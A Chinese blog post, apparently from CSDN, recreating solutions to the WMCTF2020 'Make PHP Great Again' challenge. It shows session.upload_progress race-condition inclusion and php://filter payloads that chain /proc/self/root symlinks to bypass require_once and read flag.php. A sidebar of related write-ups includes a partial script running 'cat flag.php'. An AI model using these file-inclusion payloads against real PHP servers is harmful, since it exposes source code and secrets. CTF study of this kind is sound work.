wmctf2020 Make PHP Great Again

最新推荐文章于 2024-09-22 19:58:18 发布
最新推荐文章于 2024-09-22 19:58:18 发布
阅读量4.9k 收藏 9
点赞数 5
分类专栏: ctf 文章标签: php web 代码审计 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/108021053
版权

这个题目是之后赵师傅发了wp,自己进行复现的,因为自己比较菜,所以好多都是看师傅们的博客。
于是自己也来记录记录,下面还有一些问题,希望大佬们可以回答一下下。非常感谢!!!

题目代码:

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  $a=($_GET['file']);
  require_once($a);
}

第一个是可以通过上传PHP_SESSION_UPLOAD_PROGRESS
然后进行访问/tmp/sess_xxx,进行文件包含
原理就是,条件竞争。如果不清楚看一看这篇文章利用session.upload_progress进行文件包含和反序列化渗透

#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="http://localhost:8000/ctf/wmctf/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
    session_start();
?>

下面引用师傅们wp里面的照片

第二个方法是通过php的小truck
在这里有个小知识点,/proc/self指向当前进程的/proc/pid/,/proc/self/root/是指向/的符号链接,想到这里,用伪协议配合多级符号链接的办法进行绕过。
直接构造payload

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

然后在群里面看到有师傅使用

?file=php://filter/convert.base64-encode/resource=/nice/../../proc/self/cwd/flag.php

这个原理自己太菜不知道,还希望师傅们可以解释一下。

总结:
上面第一个方法的思想和我最近做的题有点像。
ctfshow
session序列化

参考:
https://mp.weixin.qq.com/s?__biz=MzA5ODA0NDE2MA==&mid=2649729209&idx=1&sn=78c1f6cf291e5cfca3088f02216ccffd&chksm=888c98d6bffb11c014d8f98437879564702bd35b100f4337cbdf1f3cff827edfa4b9a8672637&mpshare=1&scene=23&srcid=0812s60kjiOtHT66otXJWIHt&sharer_sharetime=1597388716474&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd
https://blog.frankli.site/2020/08/05/WMCTF2020-PHP-source-analysis/

Firebasky
关注
专栏目录
buu-[WMCTF2020]Make PHP Great Again
qaq517384的博客
10-26 279
考点: 绕过require_once() 打开环境就是源码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 第一反应是去百度绕过require_once(),毕竟见识小,小本本记一下 php源码分析 require_once 绕过不能重复包含文件的限制 /root/proc/self再多放几个也不是问题 payloa
[WMCTF2020]Make PHP Great Again
fmyyy1的博客
05-25 1313
源码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 解法一 这一看就是session.upload_progress文件包含 import io import requests import threading sessid = 'bbbbbbb' data = {"cmd":"system('cat flag.ph
[WMCTF2020]Make PHP Great Again 2.01
最新发布
alwtj的博客
09-22 798
又是php代码审计,开始吧.这不用审吧,啊喂.意思就是我们要利用require_once()函数和传入的file的value去读取flag的内容.,貌似呢require_once()已经被用过一次了,直接读取还不行,看一下下面的知识点.
[WMCTF2020]Make PHP Great Again非预期解原因
azraelxuemo的博客
12-01 449
当时这个题出现了一个这样的非预期解 ?file=php://filter/convert.base64-encode/resource=/nice/../../proc/self/cwd/flag.php 以及这样回失败 ?file=php://filter/convert.base64-encode/resource=/proc/self/cwd/flag.php 这里涉及php这样的一个trunk,我是调试源码发现的 环境配置 unsucess.php <?php include "flag.
[WMCTF2020]Make PHP Great Again 2.0
nigo134的博客
06-18 626
进入页面给出代码 这里有个require_once()函数需要了解一下,如果require_once包含过一次flag.php再次出现则不会执行发现require文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。/proc/self指向当前进程的/proc/pid/ /proc/self/root/是指向/的符号链接使用伪协议来读取flag,构造payload: ?file=php://filter/read=convert.base64-encode/resource=/pr
Make Python great again.zip
07-09
Make Python great again
Make the Web Great Again!-crx插件
04-06
语言:English 扩展网络功能的扩展! 如果您渴望使用老式的Trump-Pence徽标,可以通过此Chrome扩展程序将其重新使用。 它将用原始的Trump-Pence徽标替换引用“ Trump”或“ Pence”的图像。
Make GitHub Great Again-crx插件
04-02
语言:English 扩展再次制作github! 让您的旧github回来。 删除新的黑暗TopBar。 https://github.com/dennissnijder/makegithubgreatagain
Make V1 Great Again-crx插件
03-24
V1糟透了,因此请尝试减轻痛苦。 支持语言:English
BUUCTF--[WMCTF2020]Make PHP Great Again 2.0
qq_46263951的博客
08-18 668
进入页面给出代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有个require_once()函数需要了解一下,如果require_once包含过一次flag.php再次出现则不会执行 发现require文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。 /proc/sel..
[WMCTF2021]Make PHP Great Again And Again
feng的博客
10-27 582
前言 也是很久之前WMCTF2021中Web的一道题目,当时一点头绪都没有,然后也没有复现,今天晚上跟着赵总的博客进行了学习,也是学习到了非常多的东西。本文只是跟着赵总的博客进行了一波复现,记录下来,仅此而已。 题目环境 题目本身给了shell,但是有着诸多的限制,包括disable_functions,open_basedir,flag文件是700等。 而且不出网,流量是nginx转发进内网。 考虑到是nginx+php-fpm,联想到之前蓝帽杯的那题,很正常会想到利用ftp的被动模式攻击fpm实现恶意加
BUUCTF--[WMCTF2020]Make PHP Great Again
qq_46263951的博客
08-11 1223
进入页面后给出一段代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有一个require_once函数之前没有见过 require_once语句和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含。 equire_once() 为了避免重复加载..
[WMCTF2020]Make PHP Great Again 软连接绕过
qq_54929891的博客
05-23 940
<?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 打开题目一看,这么几行代码,就这? 话不多说直接伪协议读取flag.php php://filter/read=convert.base64-encode/resource=flag.php 欸嘿,啥都没出来,也没报错说什么有过滤??或许这个函数有可能不一样,去.
-------已搬运--------BUUCTF:WMCTF2020]Make PHP Great Again --文件包含 --- require_once php7.4 的trick
Zero_Adam的博客
05-03 658
一、自己做: 代码简单, <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 用filter读取,能够读取到file=../../../../../etc/passwd。用上filter等等,就是读取不到flag.php。 然后我就想到了之前的 文件包含漏洞的。那个上传一个文件,然后包含自己,使得PHP程序运行不完,然后临
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值